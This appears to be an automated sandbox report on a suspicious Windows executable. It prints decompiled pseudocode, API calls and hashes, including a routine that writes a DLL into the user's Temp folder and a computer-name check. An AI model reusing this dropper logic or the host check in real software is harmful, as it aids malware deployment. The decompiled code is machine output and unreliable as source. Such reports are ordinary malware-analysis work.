						if( *((intOrPtr*)(_a4 + 8)) == 0) {
							L12:
							if( *((intOrPtr*)(_a4 + 0xc)) == 0) {
								L15:
								if( *((intOrPtr*)(_a4 + 0x14)) == 0) {
									L18:
									_v28 =  *((intOrPtr*)(_a4 + 0x10));
									_v16 = 0;
									_t83 = E6FF81EA0( &_v44, 0,  &_v16, _a16);
									_v8 = _t83;
									if(_v8 == 0x800007d2) {
										0x6ff80000(_v16 << 1);
										_t136 = _t136 + 4;
										_v12 = _t83;
										if(_v12 == 0) {
											_v8 = 0xc0000bbb;
										} else {
											_v8 = E6FF81EA0( &_v44, _v12,  &_v16, _a16);
											if(_v8 == 0) {
												_v20 = WideCharToMultiByte(0, 0, _v12, 0xffffffff, 0, 0, 0, 0);
												if( *_a12 < _v20) {
													_v8 = 0x800007d2;
												} else {
													WideCharToMultiByte(0, 0, _v12, 0xffffffff, _a8,  *_a12, 0, 0);
												}
												 *_a12 = _v20;
											}
											0x6ff80000(_v12);
											_t136 = _t136 + 4;
										}
									}
									L27:
									0x6ff80000(_v44);
									0x6ff80000(_v40);
									0x6ff80000(_v36);
									0x6ff80000(_v32);
									0x6ff80000(_v24);
									return _v8;
								}
								_t95 = E6FF82B80( *((intOrPtr*)(_a4 + 0x14)));
								_t136 = _t136 + 4;
								_v24 = _t95;
								if(_v24 != 0) {
									goto L18;
								}
								goto L27;
							}
							_t97 = E6FF82B80( *((intOrPtr*)(_a4 + 0xc)));
							_t136 = _t136 + 4;
							_v32 = _t97;
							if(_v32 != 0) {
								goto L15;
							}
							goto L27;
						}
						_t99 = E6FF82B80( *((intOrPtr*)(_a4 + 8)));
						_t136 = _t136 + 4;
						_v36 = _t99;
						if(_v36 != 0) {
							goto L12;
						}
						goto L27;
					}
					_t101 = E6FF82B80( *((intOrPtr*)(_a4 + 4)));
					_t136 = _t136 + 4;
					_v40 = _t101;
					if(_v40 != 0) {
						goto L9;
					}
					goto L27;
				}
				_t103 = E6FF82B80( *_a4);
				_t136 = _t136 + 4;
				_v44 = _t103;
				if(_v44 != 0) {
					goto L6;
				}
				goto L27;
			}





















                0x6ff82096
                0x6ff820b2
                0x6ff820b7
                0x6ff820be
                0x00000000
                0x6ff820c6
                0x6ff820d2
                0x6ff820d5
                0x6ff820d8
                0x6ff820db
                0x6ff820de
                0x6ff820e1
                0x6ff820ea
                0x6ff82108
                0x6ff8210f
                0x6ff8212e
                0x6ff82135
                0x6ff82154
                0x6ff8215b
                0x6ff8217a
                0x6ff82181
                0x6ff821a0
                0x6ff821a6
                0x6ff821a9
                0x6ff821be
                0x6ff821c3
                0x6ff821cd
                0x6ff821d9
                0x6ff821de
                0x6ff821e1
                0x6ff821e8
                0x6ff8226e
                0x6ff821ee
                0x6ff82203
                0x6ff8220a
                0x6ff82224
                0x6ff8222f
                0x6ff82251
                0x6ff82231
                0x6ff82249
                0x6ff82249
                0x6ff8225e
                0x6ff8225e
                0x6ff82264
                0x6ff82269
                0x6ff82269
                0x6ff821e8
                0x6ff82275
                0x6ff82279
                0x6ff82285
                0x6ff82291
                0x6ff8229d
                0x6ff822a9
                0x00000000
                0x6ff822b1
                0x6ff8218a
                0x6ff8218f
                0x6ff82192
                0x6ff82199
                0x00000000
                0x00000000
                0x00000000
                0x6ff8219b
                0x6ff82164
                0x6ff82169
                0x6ff8216c
                0x6ff82173
                0x00000000
                0x00000000
                0x00000000
                0x6ff82175
                0x6ff8213e
                0x6ff82143
                0x6ff82146
                0x6ff8214d
                0x00000000
                0x00000000
                0x00000000
                0x6ff8214f
                0x6ff82118
                0x6ff8211d
                0x6ff82120
                0x6ff82127
                0x00000000
                0x00000000
                0x00000000
                0x6ff82129
                0x6ff820f2
                0x6ff820f7
                0x6ff820fa
                0x6ff82101
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %p %p %p 0x%08x
                • API String ID: 0-2106592379
                • Opcode ID: 985701ae172881eaf6ffebc42810567474cb25d399680f3651fe86e1283d20a3
                • Instruction ID: 9ff21b7f37d80de3f6f4944a60e43cc42327b114859789f042502f158bb5db72
                • Opcode Fuzzy Hash: 985701ae172881eaf6ffebc42810567474cb25d399680f3651fe86e1283d20a3
                • Instruction Fuzzy Hash: E4710AB5904208EFDF04CF94D980BDEB7B5BF48314F208659E925AB384D775BA80CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82560, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E6FF82560(intOrPtr _a4, intOrPtr _a8, char* _a12, int* _a16) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				char _v20;
				short _v2068;
				short* _t32;
				intOrPtr _t33;
				int _t44;
				void* _t58;
				void* _t61;

				_v8 = 0;
				_t32 =  &_v2068;
				0x6ff80000(_t32);
				_v20 = _t32;
				_t33 = _a8;
				0x6ff80000(_a4, _t33, _a12, _a16);
				0x6ff80000("%s %d %p %p\n", _t33);
				_t61 = _t58 + 0x1c;
				if(_a12 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					if(_a4 == 0) {
						L6:
						_v16 = E6FF82440(_v8, _a8,  &_v2068,  &_v20);
						if(_v16 == 0) {
							_v12 = WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, 0, 0, 0, 0);
							if( *_a16 >= _v12) {
								WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, _a12, _v12, 0, 0);
							} else {
								_v16 = 0x800007d2;
							}
							 *_a16 = _v12;
						}
						0x6ff80000(_v8);
						return _v16;
					}
					_t44 = E6FF82B80(_a4);
					_t61 = _t61 + 4;
					_v8 = _t44;
					if(_v8 != 0) {
						goto L6;
					}
					return 0xc0000bbb;
				}
			}













                0x6ff82569
                0x6ff82570
                0x6ff82577
                0x6ff8257f
                0x6ff8258a
                0x6ff82592
                0x6ff825a0
                0x6ff825a5
                0x6ff825ac
                0x00000000
                0x6ff825be
                0x6ff825c2
                0x6ff825e3
                0x6ff825fb
                0x6ff82602
                0x6ff8261f
                0x6ff8262a
                0x6ff8264e
                0x6ff8262c
                0x6ff8262c
                0x6ff8262c
                0x6ff8265a
                0x6ff8265a
                0x6ff82660
                0x00000000
                0x6ff82668
                0x6ff825c8
                0x6ff825cd
                0x6ff825d0
                0x6ff825d7
                0x00000000
                0x00000000
                0x00000000
                0x6ff825d9

                APIs
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF82619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF8264E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide
                • String ID: %s %d %p %p
                • API String ID: 626452242-2135802371
                • Opcode ID: 6e9ce29c9425910820c4e229cbb414f0b48d590d38c59ede3c92a0b9dbae5527
                • Instruction ID: 933faf7f063966fcdbdc59592c8d1b00372ffe5c736e11dc471f9cf96b6655b6
                • Opcode Fuzzy Hash: 6e9ce29c9425910820c4e229cbb414f0b48d590d38c59ede3c92a0b9dbae5527
                • Instruction Fuzzy Hash: B0313AB5904208ABDF10DF94CD40FAE77B8BF08714F108559B924AB2C4D7B5AA51CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                0x00404de0
                0x00404e05
                0x00404e25
                0x00404e28
                0x00404e2b
                0x00404e42
                0x00404e48
                0x00404e4f
                0x00404e56
                0x00404e5d
                0x00404e62
                0x00404e68
                0x00000000
                0x00404e78
                0x00404e12
                0x00404e65
                0x00404e65
                0x00000000
                0x00404e65
                0x00404e1e
                0x00404e20
                0x00000000
                0x00404e20
                0x00404de6
                0x00000000
                0x00000000
                0x00404ded
                0x00000000

                APIs
                • IsWindowVisible.USER32 ref: 00404E0A
                • CallWindowProcA.USER32 ref: 00404E78
                  • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82CE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E6FF82CE0(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				short _v44;
				long _t13;
				intOrPtr _t17;

				_t13 =  &_v44;
				0x6ff80000(_t13);
				_v8 = _t13;
				if(GetComputerNameW( &_v44,  &_v8) != 0) {
					if(_a8 != _v8) {
						L5:
						_v12 = 0;
						L6:
						return _v12;
					}
					_t17 = _a4;
					__imp___wcsnicmp(_t17,  &_v44, _v8);
					if(_t17 != 0) {
						goto L5;
					}
					_v12 = 1;
					goto L6;
				}
				return 0;
			}








                0x6ff82ce6
                0x6ff82cea
                0x6ff82cf2
                0x6ff82d05
                0x6ff82d11
                0x6ff82d35
                0x6ff82d35
                0x6ff82d3c
                0x00000000
                0x6ff82d3c
                0x6ff82d1b
                0x6ff82d1f
                0x6ff82d2a
                0x00000000
                0x00000000
                0x6ff82d2c
                0x00000000
                0x6ff82d2c
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.265700956.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000000.00000002.265685733.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265732809.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.265754390.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000000.00000002.265772810.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ComputerName_wcsnicmp
                • String ID: P~u
                • API String ID: 657830731-3400813311
                • Opcode ID: 464b5313d9c2caf99660f91777d5271ca2e87ac49fb3cc1bc335c63ededf5179
                • Instruction ID: 4bbd63994f885e24792fda9b50c5bdf1e5b715894faeef8b914172634ccad60d
                • Opcode Fuzzy Hash: 464b5313d9c2caf99660f91777d5271ca2e87ac49fb3cc1bc335c63ededf5179
                • Instruction Fuzzy Hash: B8F03CB2904208EBCB00DFA4C988ACEBBB8AF08314F504954E916AB204F731F6958B71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\FRONTD~1\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                0x004024f1
                0x004024f1
                0x004024f4
                0x0040250f
                0x004024f6
                0x004024f8
                0x004024fd
                0x00402504
                0x00402516
                0x0040268f
                0x0040268f
                0x0040251c
                0x0040252e
                0x004015a6
                0x004015a8
                0x00000000
                0x004015ae
                0x004015a8
                0x004028c1
                0x004028cd

                APIs
                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                Strings
                • C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll, xrefs: 004024FD, 00402522
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWritelstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\nsr3472.tmp\fbnwl.dll
                • API String ID: 427699356-3992239152
                • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                0x00405401
                0x0040541d
                0x00405425
                0x0040542a
                0x00000000
                0x00405430
                0x00405434

                APIs
                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                • CloseHandle.KERNEL32(?), ref: 0040542A
                Strings
                • Error launching installer, xrefs: 0040540B
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: Error launching installer
                • API String ID: 3712363035-66219284
                • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                0x00403557
                0x0040355f
                0x00403566
                0x00403569
                0x00403569
                0x0040356b
                0x00403570
                0x00403577
                0x0040357d
                0x00403581
                0x00403582
                0x0040358a

                APIs
                • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                • GlobalFree.KERNEL32 ref: 00403577
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403568
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 1100898210-2382934351
                • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                0x004056d3
                0x004056dd
                0x004056df
                0x004056e6
                0x004056ee
                0x00000000
                0x00000000
                0x00000000
                0x004056ee
                0x004056f0
                0x004056f5

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RHK098760045678009000.exe,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 004056D8
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RHK098760045678009000.exe,C:\Users\user\Desktop\RHK098760045678009000.exe,80000000,00000003), ref: 004056E6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3976562730
                • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                0x004057f0
                0x004057f2
                0x0040581a
                0x004057ff
                0x00405804
                0x0040580f
                0x00000000
                0x0040582c
                0x00405818
                0x00405818
                0x00000000

                APIs
                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: RHK098760045678009000.exe PID: 4364 Parent PID: 1744 RHK098760045678009000.exeCOMMON

                Executed Functions

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000001.00000001.263077499.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401489, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                Memory Dump Source
                • Source File: 00000001.00000001.263077499.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FindResource
                • String ID:
                • API String ID: 1635176832-0
                • Opcode ID: 3df545f459032f05f82f03ce3f77b6816ae03f6e200b67478aca7feb0449ef50
                • Instruction ID: 407907d87cbb6ff9fe390b1ec32cbc08c0ffb1da0b112ac5fc55b6e00c7f45a0
                • Opcode Fuzzy Hash: 3df545f459032f05f82f03ce3f77b6816ae03f6e200b67478aca7feb0449ef50
                • Instruction Fuzzy Hash: 3EF03C74A01304FBE7306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                0x00403e3d
                0x00403e43
                0x00403e49
                0x00403e7b
                0x00403e80
                0x00403e86
                0x00000000
                0x00403e86
                0x00403e4d
                0x00403e4f
                0x00403e4f
                0x00403e66
                0x00403e6f
                0x00403e77
                0x00000000
                0x00000000
                0x00403e57
                0x00403e59
                0x00000000
                0x00000000
                0x00403e5c
                0x00403e61
                0x00403e62
                0x00403e64
                0x00000000
                0x00000000
                0x00403e64
                0x00000000

                APIs
